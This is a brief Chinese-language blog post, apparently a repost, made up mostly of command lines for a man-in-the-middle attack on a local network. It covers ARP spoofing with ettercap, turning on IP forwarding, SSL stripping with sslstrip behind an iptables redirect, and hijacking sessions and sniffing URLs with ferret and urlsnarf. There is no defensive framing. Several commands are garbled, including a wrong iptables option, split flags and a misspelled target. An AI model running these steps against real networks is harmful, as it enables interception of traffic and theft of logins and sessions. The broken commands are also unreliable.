ARP欺騙,嗅探,DNS欺騙,Session劫持
阿新 • • 發佈:2019-02-10
ARP欺騙
使用工具ettercap
vim /etc/NetworkManager/NetworkManager.conf #修改配置
將manager改為true
service network-manager restart #重啟配置
vim /etc/ettercap/etter.conf #配置ettercap
ec_uid=0
ec_gid=0
linux中 if you use iptables… 中內容註釋去掉
檢視ip轉發模式
cat /proc/sys/net/ipv4/ip_forward
開啟ip轉發模式
echo 1 >> /proc/sys /net/ipv4/ip_forward
ettercap -i wlan0 -Tq -M arp:remote #啟動ARP欺騙
driftnet檢視測試結果
嗅探
wireshark
Ssl資料嗅探
工具 Sslstrip
sslstrip -p -l 10000 -w log.txt
配置 iptables -n nat -A PREROUTING -p -tcp --destination -port 80 -j REDITECT --to-port 10000 #把80埠轉到10000埠
sslstrip -p -l 10000 -w log.txt #監聽10000埠並寫入日誌檔案
Session劫持
ferret -r qq.cap
Url嗅探
urlsnarf -i 網絡卡